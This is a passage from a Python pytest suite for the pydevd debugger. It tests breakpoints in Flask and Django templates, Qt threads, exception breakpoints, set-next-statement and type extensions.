with case_setup.test_file('_debugger_case20.py') as writer:
writer.write_make_initial_run()
# We already check if it prints 'TEST SUCEEDED' by default, so, nothing
# else should be needed in this test as it tests what's needed just by
# running the module.
writer.finished_ok = True
@pytest.mark.skipif(not TEST_FLASK, reason='No flask available')
def test_case_flask(case_setup_flask):
with case_setup_flask.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_multi_threads_single_notification(True)
writer.write_add_breakpoint_jinja2(5, None, 'hello.html')
writer.write_add_breakpoint_jinja2(8, None, 'hello.html')
writer.write_make_initial_run()
t = writer.create_request_thread()
time.sleep(2) # Give flask some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_single_notification_as_hit(line=5)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars(['<var name="content" type="str"'])
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(line=8)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars(['<var name="content" type="str"'])
writer.write_run_thread(hit.thread_id)
contents = t.wait_for_contents()
assert '<title>Hello</title>' in contents
assert 'Flask-Jinja-Test' in contents
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_a(case_setup_django):
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', get_environ=get_environ) as writer:
writer.write_add_breakpoint_django(5, None, 'index.html')
writer.write_make_initial_run()
t = writer.create_request_thread('my_app')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_get_variable(hit.thread_id, hit.frame_id, 'entry')
writer.wait_for_vars([
'<var name="key" type="str"',
'v1'
])
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_get_variable(hit.thread_id, hit.frame_id, 'entry')
writer.wait_for_vars([
'<var name="key" type="str"',
'v2'
])
writer.write_run_thread(hit.thread_id)
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
if contents != '<ul><li>v1:v1</li><li>v2:v2</li></ul>':
raise AssertionError('%s != <ul><li>v1:v1</li><li>v2:v2</li></ul>' % (contents,))
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_b(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_add_breakpoint_django(4, None, 'name.html')
writer.write_add_exception_breakpoint_django()
writer.write_remove_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/name')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=4)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="form" type="NameForm" qualifier="my_app.forms" value="NameForm%253A')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_template_inherits_no_exception(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
# Check that it doesn't have issues with inherits + django exception breakpoints.
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/inherits')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
assert contents == '''"chat_mode=True""chat_mode=False"'''
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_no_var_error(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
# Check that it doesn't have issues with inherits + django exception breakpoints.
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/no_var_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
assert contents == '''no_pat_name'''
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
@pytest.mark.parametrize("jmc", [False, True])
def test_case_django_no_attribute_exception_breakpoint(case_setup_django, jmc):
kwargs = {}
if jmc:
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
kwargs['get_environ'] = get_environ
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', **kwargs) as writer:
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=7, file='template_error.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="entry" type="Entry" qualifier="my_app.views" value="Entry: v1:v1" isContainer="True"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_no_attribute_exception_breakpoint_and_regular_exceptions(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_add_exception_breakpoint_django()
# The django plugin has priority over the regular exception breakpoint.
writer.write_add_exception_breakpoint_with_policy(
'django.template.base.VariableDoesNotExist',
notify_on_handled_exceptions=2, # 2 means notify only on first raise.
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=7, file='template_error.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="entry" type="Entry" qualifier="my_app.views" value="Entry: v1:v1" isContainer="True"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
@pytest.mark.parametrize("jmc", [False, True])
def test_case_django_invalid_template_exception_breakpoint(case_setup_django, jmc):
kwargs = {}
if jmc:
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
kwargs['get_environ'] = get_environ
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', **kwargs) as writer:
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error2')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=4, file='template_error2.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="token" type="Token" qualifier="django.template.base" value="Token:')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_CYTHON, reason='No cython available')
def test_cython(case_setup):
from _pydevd_bundle import pydevd_cython
assert pydevd_cython.trace_dispatch is not None
def _has_qt():
try:
try:
from PySide import QtCore # @UnresolvedImport
return True
except:
from PySide2 import QtCore # @UnresolvedImport
return True
except:
try:
from PyQt4 import QtCore # @UnresolvedImport
return True
except:
try:
from PyQt5 import QtCore # @UnresolvedImport
return True
except:
pass
return False
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread1(case_setup):
with case_setup.test_file('_debugger_case_qthread1.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'run')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread2(case_setup):
with case_setup.test_file('_debugger_case_qthread2.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'long_running')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread3(case_setup):
with case_setup.test_file('_debugger_case_qthread3.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'run')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread4(case_setup):
with case_setup.test_file('_debugger_case_qthread4.py') as writer:
original_additional_output_checks = writer.additional_output_checks
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if 'On start called' not in stdout:
raise AssertionError('Expected "On start called" to be in stdout:\n%s' % (stdout,))
if 'Done sleeping' not in stdout:
raise AssertionError('Expected "Done sleeping" to be in stdout:\n%s' % (stdout,))
if 'native Qt signal is not callable' in stderr:
raise AssertionError('Did not expect "native Qt signal is not callable" to be in stderr:\n%s' % (stderr,))
breakpoint_id = writer.write_add_breakpoint(28, 'on_start') # breakpoint on print('On start called2').
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
def test_m_switch(case_setup_m_switch):
with case_setup_m_switch.test_file() as writer:
writer.log.append('writing add breakpoint')
breakpoint_id = writer.write_add_breakpoint(1, None)
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
def test_module_entry_point(case_setup_m_switch_entry_point):
with case_setup_m_switch_entry_point.test_file() as writer:
writer.log.append('writing add breakpoint')
breakpoint_id = writer.write_add_breakpoint(1, None)
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_check_tracer_with_exceptions(case_setup):
def get_environ(writer):
env = os.environ.copy()
# This test requires regular tracing (without cython).
env['PYDEVD_USE_CYTHON'] = 'NO'
env['PYDEVD_USE_FRAME_EVAL'] = 'NO'
return env
with case_setup.test_file('_debugger_case_check_tracer.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy('IndexError', "1", "1", "1")
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.parametrize('target_file', [
'_debugger_case_unhandled_exceptions_generator.py',
'_debugger_case_unhandled_exceptions_listcomp.py',
])
@pytest.mark.parametrize('unhandled', [False, True])
@pytest.mark.skipif(IS_JYTHON, reason='Not ok for Jython.')
def test_case_handled_and_unhandled_exception_generator(case_setup, target_file, unhandled):
def check_test_suceeded_msg(writer, stdout, stderr):
# Don't call super (we have an unhandled exception in the stack trace).
return 'TEST SUCEEDED' in ''.join(stdout) and 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'ZeroDivisionError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
target_file,
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
EXPECTED_RETURNCODE=1,
) as writer:
if unhandled:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
else:
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "0", "0")
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION if unhandled else REASON_CAUGHT_EXCEPTION)
assert hit.line == writer.get_line_index_with_content('# exc line')
if 'generator' in target_file:
expected_frame_names = ['<genexpr>', 'f', '<module>']
else:
if IS_PY27 or IS_PY26:
expected_frame_names = ['f', '<module>']
else:
expected_frame_names = ['<listcomp>', 'f', '<module>']
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
frame_names = [unquote(f['name']).replace('<', '<').replace('>', '>') for f in msg.thread.frame]
assert frame_names == expected_frame_names
writer.write_run_thread(hit.thread_id)
if not unhandled:
if (IS_PY26 or IS_PY27) and 'listcomp' in target_file:
expected_lines = [
writer.get_line_index_with_content('# call exc'),
]
else:
expected_lines = [
writer.get_line_index_with_content('# exc line'),
writer.get_line_index_with_content('# call exc'),
]
for expected_line in expected_lines:
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
assert hit.line == expected_line
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
frame_names = [unquote(f['name']).replace('<', '<').replace('>', '>') for f in msg.thread.frame]
assert frame_names == expected_frame_names
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_basic(case_setup):
def check_test_suceeded_msg(writer, stdout, stderr):
# Don't call super (we have an unhandled exception in the stack trace).
return 'TEST SUCEEDED' in ''.join(stdout) and 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise Exception' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'_debugger_case_unhandled_exceptions.py',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
EXPECTED_RETURNCODE=1,
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
def check(hit, exc_type, exc_desc):
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:exc_type in msg and 'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
assert unquote(msg.thread['exc_desc']) == exc_desc
assert unquote(msg.thread['exc_type']) in (
"<type 'exceptions.%s'>" % (exc_type,), # py2
"<class '%s'>" % (exc_type,) # py3
)
if len(msg.thread.frame) == 0:
assert unquote(unquote(msg.thread.frame['file'])).endswith('_debugger_case_unhandled_exceptions.py')
else:
assert unquote(unquote(msg.thread.frame[0]['file'])).endswith('_debugger_case_unhandled_exceptions.py')
writer.write_run_thread(hit.thread_id)
# Will stop in 2 background threads
hit0 = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
thread_id1 = hit0.thread_id
hit1 = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
thread_id2 = hit1.thread_id
if hit0.name == 'thread_func2':
check(hit0, 'ValueError', 'in thread 2')
check(hit1, 'Exception', 'in thread 1')
else:
check(hit0, 'Exception', 'in thread 1')
check(hit1, 'ValueError', 'in thread 2')
writer.write_run_thread(thread_id1)
writer.write_run_thread(thread_id2)
# Will stop in main thread
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
assert hit.name == '<module>'
thread_id3 = hit.thread_id
# Requesting the stack in an unhandled exception should provide the stack of the exception,
# not the current location of the program.
writer.write_get_thread_stack(thread_id3)
msg = writer.wait_for_message(CMD_GET_THREAD_STACK)
assert len(msg.thread.frame) == 0 # In main thread (must have no back frames).
assert msg.thread.frame['name'] == '<module>'
check(hit, 'IndexError', 'in main')
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_in_top_level1(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
EXPECTED_RETURNCODE=1,
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
# Will stop in main thread
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_in_top_level2(case_setup_unhandled_exceptions):
# Note: expecting unhandled exception to be printed to stderr.
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
pydevd_dirname = os.path.dirname(writer.get_pydevd_file())
curr_pythonpath = pydevd_dirname + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
return env
def update_command_line_args(writer, args):
# Start pydevd with '-m' to see how it deal with being called with
# runpy at the start.
assert args[0].endswith('pydevd.py')
args = ['-m', 'pydevd'] + args[1:]
return args
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
get_environ=get_environ,
update_command_line_args=update_command_line_args,
EXPECTED_RETURNCODE='any',
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
# Should stop (only once) in the main thread.
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_in_top_level3(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
EXPECTED_RETURNCODE=1
) as writer:
# Handled and unhandled
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "1", "0")
writer.write_make_initial_run()
# Will stop in main thread twice: once one we find that the exception is being
# thrown and another in postmortem mode when we discover it's uncaught.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_in_top_level4(case_setup_unhandled_exceptions):
# Note: expecting unhandled exception to be printed to stderr.
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level2.py',
EXPECTED_RETURNCODE=1,
) as writer:
# Handled and unhandled
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "1", "0")
writer.write_make_initial_run()
# We have an exception thrown and handled and another which is thrown and is then unhandled.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='Only for Python.')
def test_case_set_next_statement(case_setup):
with case_setup.test_file('_debugger_case_set_next_statement.py') as writer:
breakpoint_id = writer.write_add_breakpoint(6, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=6) # Stop in line a=3 (before setting it)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 2"'.format(builtin_qualifier))
writer.write_set_next_statement(hit.thread_id, 2, 'method')
hit = writer.wait_for_breakpoint_hit('127', line=2)
# Check that it's still unchanged
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 2"'.format(builtin_qualifier))
# After a step over it should become 1 as we executed line which sets a = 1
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108')
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 1"'.format(builtin_qualifier))
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_unhandled_exceptions_get_stack(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exception_get_stack.py',
EXPECTED_RETURNCODE='any',
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_get_thread_stack(hit.thread_id)
msg = writer.wait_for_get_thread_stack_message()
files = [frame['file'] for frame in msg.thread.frame]
assert msg.thread['id'] == hit.thread_id
if not files[0].endswith('_debugger_case_unhandled_exception_get_stack.py'):
raise AssertionError('Expected to find _debugger_case_unhandled_exception_get_stack.py in files[0]. Found: %s' % ('\n'.join(files),))
assert len(msg.thread.frame) == 0 # No back frames (stopped in main).
assert msg.thread.frame['name'] == '<module>'
assert msg.thread.frame['line'] == str(writer.get_line_index_with_content('break line on unhandled exception'))
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='Only for Python.')
def test_case_get_next_statement_targets(case_setup):
with case_setup.test_file('_debugger_case_get_next_statement_targets.py') as writer:
breakpoint_id = writer.write_add_breakpoint(21, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=21)
writer.write_get_next_statement_targets(hit.thread_id, hit.frame_id)
targets = writer.wait_for_get_next_statement_targets()
expected = set((2, 3, 5, 8, 9, 10, 12, 13, 14, 15, 17, 18, 19, 21))
assert targets == expected, 'Expected targets to be %s, was: %s' % (expected, targets)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON or IS_JYTHON, reason='Failing on IronPython and Jython (needs to be investigated).')
def test_case_type_ext(case_setup):
# Custom type presentation extensions
def get_environ(self):
env = os.environ.copy()
python_path = env.get("PYTHONPATH", "")
ext_base = debugger_unittest._get_debugger_test_file('my_extensions')
env['PYTHONPATH'] = ext_base + os.pathsep + python_path if python_path else ext_base
return env
with case_setup.test_file('_debugger_case_type_ext.py', get_environ=get_environ) as writer:
writer.get_environ = get_environ
writer.write_add_breakpoint(7, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
assert writer.wait_for_var([
[
r'<var name="my_rect" type="Rect" qualifier="__main__" value="Rectangle%255BLength%253A 5%252C Width%253A 10 %252C Area%253A 50%255D" isContainer="True" />',
r'<var name="my_rect" type="Rect" value="Rect: <__main__.Rect object at', # Jython
]
])
writer.write_get_variable(hit.thread_id, hit.frame_id, 'my_rect')
assert writer.wait_for_var(r'<var name="area" type="int" qualifier="{0}" value="int%253A 50" />'.format(builtin_qualifier))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON or IS_JYTHON, reason='Failing on IronPython and Jython (needs to be investigated).')
def test_case_event_ext(case_setup):
def get_environ(self):
env = os.environ.copy()
python_path = env.get("PYTHONPATH", "")
ext_base = debugger_unittest._get_debugger_test_file('my_extensions')
env['PYTHONPATH'] = ext_base + os.pathsep + python_path if python_path else ext_base
env["VERIFY_EVENT_TEST"] = "1"
return env
# Test initialize event for extensions
with case_setup.test_file('_debugger_case_event_ext.py', get_environ=get_environ) as writer:
original_additional_output_checks = writer.additional_output_checks
@overrides(writer.additional_output_checks)
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if 'INITIALIZE EVENT RECEIVED' not in stdout:
raise AssertionError('No initialize event received')
writer.additional_output_checks = additional_output_checks
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Jython does not seem to be creating thread started inside tracing (investigate).')
def test_case_writer_creation_deadlock(case_setup):
# check case where there was a deadlock evaluating expressions
with case_setup.test_file('_debugger_case_thread_creation_deadlock.py') as writer:
writer.write_add_breakpoint(26, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
assert hit.line == 26, 'Expected return to be in line 26, was: %s' % (hit.line,)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'create_thread()')
writer.wait_for_evaluation('<var name="create_thread()" type="str" qualifier="{0}" value="str: create_thread:ok'.format(builtin_qualifier))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_skip_breakpoints_in_exceptions(case_setup):
# Case where breakpoint is skipped after an exception is raised over it
with case_setup.test_file('_debugger_case_skip_breakpoint_in_exceptions.py') as writer:
writer.write_add_breakpoint(5, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111', line=5)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('111', line=5)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_handled_exceptions0(case_setup):
# Stop only once per handled exception.
with case_setup.test_file('_debugger_case_exceptions.py') as writer:
writer.write_set_project_roots([os.path.dirname(writer.TEST_FILE)])
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION,
line=writer.get_line_index_with_content('raise indexerror line')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working on Jython (needs to be investigated).')
def test_case_handled_exceptions1(case_setup):
# Stop multiple times for the same handled exception.
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
def check(hit):
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_message(accept_message=lambda msg:'__exception__' in msg and 'IndexError' in msg, unquote_msg=False)
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:'IndexError' in msg and 'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
assert msg.thread['exc_desc'] == 'foo'
assert unquote(msg.thread['exc_type']) in (
"<type 'exceptions.IndexError'>", # py2
"<class 'IndexError'>" # py3
)
assert unquote(unquote(msg.thread.frame[0]['file'])).endswith('_debugger_case_exceptions.py')
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('raise indexerror line'))
check(hit)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('reraise on method2'))
check(hit)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('handle on method1'))
check(hit)
writer.finished_ok = True
def test_case_handled_exceptions2(case_setup):
# No IDE_PROJECT_ROOTS set.
def get_environ(self):
env = os.environ.copy()
# Don't stop anywhere (note: having IDE_PROJECT_ROOTS = '' will consider
# having anything not under site-packages as being in the project).
env["IDE_PROJECT_ROOTS"] = '["empty"]'
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
writer.finished_ok = True
def test_case_handled_exceptions3(case_setup):
# Don't stop on exception thrown in the same context (only at caller).
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
